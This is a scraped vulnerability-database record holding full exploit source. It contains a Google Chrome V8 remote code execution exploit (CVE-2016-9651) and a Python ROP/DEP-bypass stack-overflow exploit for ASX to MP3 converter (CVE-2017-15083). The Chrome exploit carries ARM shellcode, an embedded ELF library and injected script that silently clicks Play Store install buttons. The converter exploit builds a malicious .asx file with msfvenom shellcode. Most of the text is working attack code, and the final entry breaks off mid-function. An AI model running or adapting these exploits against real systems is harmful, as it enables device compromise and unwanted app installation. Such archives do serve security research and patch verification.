((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 \nprint(\"chrome.apk base at \"+point.toString(16)); \n \nfunction find(startAddr,len,pattern){ \nfor(var i=0; i<(len-pattern.length); i++ ) { \nfor(var j=0;j<pattern.length;j++){ \nvar temp = read_uint8(startAddr+i+j); \n//print(temp.toString(16)); \nif(temp!=pattern[j]) break; \n} \nif(j==pattern.length) return startAddr+i; \n} \nprint(\"find failed\"); \n} \nvar pattern_position=find(point,0x10000000,pattern); \n \nprint(\"find pattern at \"+to_hex(pattern_position)); \n \n \n \n \n \nfunction get_dest_from_blx(addr) { \nvar val = read_uint32_unalign(addr); \nvar s = (val & 0x400) >> 10; \nvar i1 = 1 - (((val & 0x20000000) >> 29) ^ s); \nvar i2 = 1 - (((val & 0x8000000) >> 27) ^ s); \nvar i10h = val & 0x3ff; \nvar i10l = (val & 0x7fe0000) >> 17; \nvar off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); \nreturn ((addr + 4) & ~3) + off; \n} \n \nfunction backup_original_code(start_address){ \nvar backup_arr = []; \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nbackup_arr[i]=u8arr[i]; \n} \nreturn backup_arr; \n} \n \nfunction restore_original_code(start_address,backup_arr){ \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nu8arr[i]=backup_arr[i]; \n} \n} \n \n \nhuge_func({}); \nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4))); \nvar dlsym_addr = get_dest_from_blx(pattern_position-4); \nprint(\"dlsym address is \"+to_hex(dlsym_addr)); \nvar huge_func_address = getObjAddr(huge_func)-1; \nprint(\"huge func address is \"+to_hex(huge_func_address)); \nfor(var i=0;i<20;i++){ \nprint(to_hex(read_uint32(huge_func_address+i*4))); \n} \nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 \nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry)); \nprint(to_hex(read_uint32(huge_func_code_entry))); \n \n//var so_str= \"\"; \nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe \nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e20 \nvar arrayBuffer = new ArrayBuffer(0x1000000); \nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1; \nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4); \nvar args_address = backingStoreAddress+1024; \nfunction write_shellcode(dlsym_addr,buffer){ \n//ldr r0,[pc,4]//0xe59f0004 \n//ldr r1,[pc,4]//0xe59f1004 \n//b shellcode;//0xea000001 \n//dlopen_addr//array_buffer_address \n//dlsym_addr \n//shellcode \n//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; \nvar stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; \nfor(var i=0;i<stub.length;i++){ \nglobaldv[buffer/4+i]=stub[i]; \n} \n \nshellcode = shellcode.concat([0,0,0,0]); \nfor(var i=0;i<shellcode.length/4>>>0;i++){ \n// u8arr[i+4*stub.length]=shellcode[i]; \nglobaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); \n} \nreturn stub.length*4+shellcode.length; \n} \n \nfunction xss_code(){ \n//alert(navigator.userAgent); \n//alert(document.cookie); \nvar i1=setInterval(function(){ \nif(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ \nconsole.log(\"wait load complete\"); \nreturn; \n} \nclearInterval(i1); \nvar i2=setInterval(function(){ \ndocument.getElementsByClassName(\"price buy id-track-click\")[0].click(); \nvar installButton = document.getElementById(\"purchase-ok-button\"); \nif(installButton == null) \nreturn; \ninstallButton.click(); \ndocument.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\"); \nclearInterval(i2); \nsetTimeout(function(){ \nwindow.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\"); \n},26000); \n},500); \n},500); \n} \n \nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\"; \n//var backup_arr = backup_original_code(huge_func_code_entry); \nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); \nvar args_view = new DataView(arrayBuffer,1024,100); \nvar so_file_view = new DataView(arrayBuffer,4096); \nvar js_view = new DataView(arrayBuffer,0x100000); \nargs_view.setUint32(0,dlsym_addr+0xc,true); \nargs_view.setUint32(4,dlsym_addr,true); \nargs_view.setUint32(8,huge_func_code_entry,true); \nargs_view.setUint32(12,writed_len,true); \nargs_view.setUint32(16,backingStoreAddress+4096,true); \nargs_view.setUint32(20,so_str.length/2,true); \nargs_view.setUint32(24,backingStoreAddress+0x100000,true); \nargs_view.setUint32(28,js_str.length,true); \nprint(\"length is \"+so_str.length); \nfor(var i=0;i<so_str.length;i+=2){ \nvar value = so_str.substr(i,2); \nvalue = \"0x\"+value; \nso_file_view.setUint8(i/2,parseInt(value)); \n} \nfor(var i=0;i<js_str.length;i++){ \njs_view.setUint8(i,js_str.charCodeAt(i)); \n} \n \nprint(\"begin execute shellcode\"); \nhuge_func({}); \n \nprint(\"done\"); \npostMessage(true); \n//prevent arrayBuffer to be released \nwhile(1){} \n \n} \n//main world \nfunction print(){ \nconsole.log.apply(null,arguments); \ndocument.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\"); \n} \n \n// Build a worker from an anonymous function body \nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); \n \nvar worker; \nvar exploitSucc = false; \nvar count = 0; \nfunction startExploit(){ \nprint(\"worker thread is started\"); \nworker = new Worker( blobURL ); \ncount++; \nworker.onmessage = function(e){ \nprint(\"exploit result is \"+e.data); \nexploitSucc = e.data; \nif(exploitSucc==false){ \nstartExploit(); \nreturn; \n} \nvar end = +new Date(); \nprint(\"time diff is \"+(end-begin)/1000); \n//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; \ntop.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; \n} \n} \nvar begin = +new Date(); \nstartExploit(); \n \nvar savedCount = 0; \nvar hangMonitor = setInterval(function (){ \nif(exploitSucc==true){ \nclearInterval(hangMonitor); \n}else{ \nif(savedCount==count){//maybe hang \nprint(\"worker maybe hange\"); \nworker.terminate(); \nstartExploit(); \n}else{ \nprint(\"worker is normal\"); \nsavedCount = count; \n} \n} \n},10000); \n//URL.revokeObjectURL( blobURL ); \n \n \n</script> \n</html> \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142939/googlechromev8-exec.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:32:38", "description": "", "published": "2017-10-08T00:00:00", "type": "exploitdb", "title": "ASX to MP3 converter &lt; 3.1.3.7 - &#039;.asx&#039; Local Stack Overflow (DEP Bypass)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-15083"], "modified": "2017-10-08T00:00:00", "id": "EDB-ID:42963", "href": "https://www.exploit-db.com/exploits/42963", "sourceData": "import struct,sys\r\nhead ='''<ASX version=\"3.0\">\r\n<Entry>\r\n<REF HREF=\"mms://site.com/ach/music/smpl/LACA-05928-002-tes_'''\r\n\r\n#offset 17375\r\njunk = \"A\" *17375\r\n\r\n#0x1003df8e\r\n#0x774e1035\r\nEIP=\"\\x36\\x10\\x4e\\x77\"\r\n\r\nadjust=\"A\" *4\r\n\r\ndef create_rop_chain():\r\n \r\n rop_gadgets = [\r\n 0x73dd5dce, # POP EAX # RETN [MFC42.DLL] \r\n 0x5d091368, # ptr to &VirtualProtect() [IAT COMCTL32.dll]\r\n 0x7608708e, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSVCP60.dll] \r\n 0x73dd40f1, # XCHG EAX,ESI # RETN [MFC42.DLL] \r\n 0x7c96feb7, # POP EBP # RETN [ntdll.dll] \r\n 0x7608fcec, # & push esp # ret [MSVCP60.dll]\r\n 0x01c395d4, # POP EAX # RETN [MSA2Mcodec00.dll] \r\n 0xfffffdff, # Value to negate, will become 0x00000201\r\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \r\n 0x7ca485b4, # XCHG EAX,EBX # RETN [SHELL32.dll] \r\n 0x01d64827, # POP EAX # RETN [msvos.dll] \r\n 0xffffffc0, # Value to negate, will become 0x00000040\r\n 0x77d74960, # NEG EAX # RETN [USER32.dll] \r\n 0x71ab9b46, # XCHG EAX,EDX # RETN [WS2_32.dll] \r\n 0x1003fd11, # POP ECX # RETN [MSA2Mfilter03.dll] \r\n 0x77da1d04, # &Writable location [USER32.dll]\r\n 0x01d34691, # POP EDI # RETN [MSA2Mctn01.dll] \r\n 0x76091182, # RETN (ROP NOP) [MSVCP60.dll]\r\n 0x7d7da123, # POP EAX # RETN [WMVCore.DLL] \r\n 0x90909090, # nop\r\n 0x77195015, # PUSHAD # RETN [OLEAUT32.dll] \r\n ]\r\n return ''.join(struct.pack('<I', _) for _ in rop_gadgets)\r\n\t\r\nrop_chain = create_rop_chain()\r\n\r\n#msfvenom -a x86 --platform Windows -p windows/exec cmd=calc.exe -f python -b \"\\x00\\x0a\\x0d EXITFUNC=seh\r\n#badcharacters \"\\x00\\x0a\\x0d\"\r\n\r\nbuf = \"\"\r\nbuf += \"\\xda\\xd6\\xba\\xf5\\xa4\\x32\\xf4\\xd9\\x74\\x24\\xf4\\x5d\\x31\"\r\nbuf += \"\\xc9\\xb1\\x31\\x83\\xc5\\x04\\x31\\x55\\x14\\x03\\x55\\xe1\\x46\"\r\nbuf += \"\\xc7\\x08\\xe1\\x05\\x28\\xf1\\xf1\\x69\\xa0\\x14\\xc0\\xa9\\xd6\"\r\nbuf += \"\\x5d\\x72\\x1a\\x9c\\x30\\x7e\\xd1\\xf0\\xa0\\xf5\\x97\\xdc\\xc7\"\r\nbuf += \"\\xbe\\x12\\x3b\\xe9\\x3f\\x0e\\x7f\\x68\\xc3\\x4d\\xac\\x4a\\xfa\"\r\nbuf += \"\\x9d\\xa1\\x8b\\x3b\\xc3\\x48\\xd9\\x94\\x8f\\xff\\xce\\x91\\xda\"\r\nbuf += \"\\xc3\\x65\\xe9\\xcb\\x43\\x99\\xb9\\xea\\x62\\x0c\\xb2\\xb4\\xa4\"\r\nbuf += \"\\xae\\x17\\xcd\\xec\\xa8\\x74\\xe8\\xa7\\x43\\x4e\\x86\\x39\\x82\"\r\nbuf += \"\\x9f\\x67\\x95\\xeb\\x10\\x9a\\xe7\\x2c\\x96\\x45\\x92\\x44\\xe5\"\r\nbuf += \"\\xf8\\xa5\\x92\\x94\\x26\\x23\\x01\\x3e\\xac\\x93\\xed\\xbf\\x61\"\r\nbuf += \"\\x45\\x65\\xb3\\xce\\x01\\x21\\xd7\\xd1\\xc6\\x59\\xe3\\x5a\\xe9\"\r\nbuf += \"\\x8d\\x62\\x18\\xce\\x09\\x2f\\xfa\\x6f\\x0b\\x95\\xad\\x90\\x4b\"\r\nbuf += \"\\x76\\x11\\x35\\x07\\x9a\\x46\\x44\\x4a\\xf0\\x99\\xda\\xf0\\xb6\"\r\nbuf += \"\\x9a\\xe4\\xfa\\xe6\\xf2\\xd5\\x71\\x69\\x84\\xe9\\x53\\xce\\x74\"\r\nbuf += \"\\x1b\\x6e\\xda\\xe1\\x82\\x1b\\xa7\\x6f\\x35\\xf6\\xeb\\x89\\xb6\"\r\nbuf += \"\\xf3\\x93\\x6d\\xa6\\x71\\x96\\x2a\\x60\\x69\\xea\\x23\\x05\\x8d\"\r\nbuf += \"\\x59\\x43\\x0c\\xee\\x3c\\xd7\\xcc\\xdf\\xdb\\x5f\\x76\\x20\"\r\n\r\nshellcode=\"S\"*10+buf\r\n\r\nprint \"Length of shellcode is:\",len(shellcode)\r\nprint \"Length of ropchain is:\",len(rop_chain)\r\n\r\nprint\"Calculating Garbage:\",(26000-17375-4-4-len(shellcode)-len(rop_chain))\r\n\r\ngarbage= \"C\" *8303\r\n\r\nfoot ='''_playlis.wma\"/>\r\n</Entry>\r\n</ASX>'''\r\n\r\npayload=head+junk+EIP+adjust+rop_chain+shellcode+garbage+foot\r\n\r\nfobj = open(\"exploit.asx\",\"w\")\r\nfobj.write(payload)\r\nfobj.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42963"}, {"lastseen": "2017-06-14T22:14:23", "description": "Google Chrome - V8 Private Property Arbitrary Code Execution. CVE-2016-9651. Remote exploit for Android platform", "published": "2017-06-14T00:00:00", "type": "exploitdb", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9651"], "modified": "2017-06-14T00:00:00", "id": "EDB-ID:42175", "href": "https://www.exploit-db.com/exploits/42175/", "sourceData": "<html>\r\n// Source: https://github.com/secmob/pwnfest2016/\r\n<script>\r\nfunction exploit(){\r\n\r\nfunction to_hex(num){\r\n return (num>>>0).toString(16);\r\n}\r\nfunction intarray_to_double(int_arr){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n uBuf[0]=int_arr[0];\r\n uBuf[1]=int_arr[1];\r\n return dBuf[0];\r\n}\r\n\r\nfunction str_to_double(str){//leng of str must be 8\r\n var dBuf = new Float64Array(1);\r\n var u8Buf = new Uint8Array(dBuf.buffer);\r\n for(var i=0;i<str.length;i++){\r\n u8Buf[i] = str.charCodeAt(i);\r\n }\r\n return dBuf[0];\r\n}\r\nfunction double_to_array(value){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n dBuf[0]=value;\r\n return uBuf;\r\n}\r\n\r\nfunction gc(){\r\n for(var i=0;i<0x100000/16;i++){\r\n new String;\r\n }\r\n}\r\nfunction getHiddenValue(){\r\n var obj = {};\r\n var oob = \"/re/\";\r\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\r\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\r\n var str = 'class x extends Array{'+oob+\"}\";\r\n var fun = eval(str);\r\n Object.assign(obj,fun);\r\n return obj;\r\n}\r\nvar obWin;\r\nfunction makeOobString(){\r\n var hiddenValue = getHiddenValue();\r\n var magicStr = \"bbbb\";\r\n var arr=[];\r\n var str = 'class x extends Array{}';\r\n for(var i=0;i<str.length;i++){\r\n arr[i]=str.charCodeAt(i);\r\n }\r\n var ob = new Array(0x200);\r\n ob.fill(0x31313131);\r\n gc();\r\n gc();\r\n str=String.fromCharCode.apply(null,arr);\r\n ob=ob.concat(0x32323232);\r\n var fun = eval(str); \r\n ob[2]=str;\r\n ob[3]=ob;\r\n Object.assign(fun,hiddenValue);\r\n var oobString = fun.toString();\r\n gc();\r\n gc();\r\n print(\"begin search\");\r\n var subStr = oobString.substr(0,0x8000);\r\n var pos = subStr.indexOf(magicStr);\r\n print(\"end search\");\r\n if(pos==-1){\r\n print(\"find magic failed\");\r\n postMessage(false);\r\n self.close();\r\n print(\"unpossible\");\r\n throw \"error\";\r\n }else{\r\n print(\"find magic at \"+pos);\r\n\r\n }\r\n oobString = oobString.substr(pos,ob.length*4);\r\n obWin=ob;\r\n return oobString;\r\n}\r\nvar oobString = makeOobString();\r\nprint(\"get oob string successfully\");\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n /*document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");*/\r\n}\r\nfunction str2arr(str,len){//len must be multile of 4\r\n if(len===undefined)\r\n len = str.length;\r\n var u8a = new Uint8Array(len);\r\n for(var i=0;i<len;i++){\r\n u8a[i] = str.charCodeAt(i);\r\n }\r\n return new Uint32Array(u8a.buffer);\r\n}\r\nfunction pArrayInHex(arr){\r\n var result=\"<p style='font-size:8px'>\";\r\n for(var i=0;i<arr.length;i++){\r\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\r\n result+=\" \";\r\n if(i%8==7)\r\n result+=\"<p style='font-size:8px'>\";\r\n }\r\n result+=\"<p>\";\r\n print(result);\r\n //alert(result);\r\n return result;\r\n}\r\nfunction pStrInHex(str){\r\n //var result=\"<p style='font-size:8px'>\";\r\n var result=\"\\n\";\r\n for(var i=0;i<str.length;i++){\r\n var code = str.charCodeAt(i);\r\n result+=(code+0x100).toString(16).substr(-2);\r\n if(i%4==3)\r\n result+=\" \";\r\n if(i%32==31)\r\n // result+=\"<p style='font-size:8px'>\";\r\n result+=\"\\n\";\r\n }\r\n // result+=\"<p>\";\r\n result+=\"\\n\";\r\n print(result);\r\n return result;\r\n}\r\nfunction getObjAddr(obj){\r\n obWin[0]=obj;\r\n var value2= ((str2arr(oobString,4))[0]);\r\n return value2>>>0;\r\n}\r\n\r\nvar getObj24BitsAddr = function(){\r\n var smi=0;\r\n var code = 0;\r\n var i=0;\r\n //don't allocate heap object\r\n function getAddr(obj){\r\n obWin[0]=obj;\r\n value=0;\r\n code = 0;\r\n i=0;\r\n for(i=2;i>=0;i--){\r\n code = oobString.charCodeAt(i);\r\n value = code+value*256;\r\n }\r\n return value;\r\n }\r\n return getAddr;\r\n}();\r\n\r\n\r\nvar lengthInOldSpace = 0xfffffffc;\r\nvar abarr=new Array(800);\r\nfunction sprayVM(){\r\n var i=0;\r\n var j=0;\r\n try{\r\n for(i=0;i<20;i++){\r\n var u8 = new Uint8Array(0x10000000-0x500);\r\n abarr[i]=u8;\r\n }\r\n }catch(e){}\r\n try{\r\n for(j=0;j<100;j++){\r\n var u8 = new Uint8Array(0x8000000-0x500);\r\n abarr[i+j]=u8;\r\n }\r\n }catch(e){}\r\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\r\n function getRandomInt(min, max) {\r\n min = Math.ceil(min);\r\n max = Math.floor(max);\r\n return Math.floor(Math.random() * (max - min)) + min;\r\n }\r\n delete abarr[getRandomInt(0,i)];\r\n}\r\n\r\n\r\nfunction getNewSpaceAddrs(){\r\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";*/\r\n var objsInNewSpace = new Array(80);\r\n for(var i=0;i<objsInNewSpace.length;i++){\r\n //var xx=escape(str);\r\n var xx = new Array(0x70000/4);\r\n 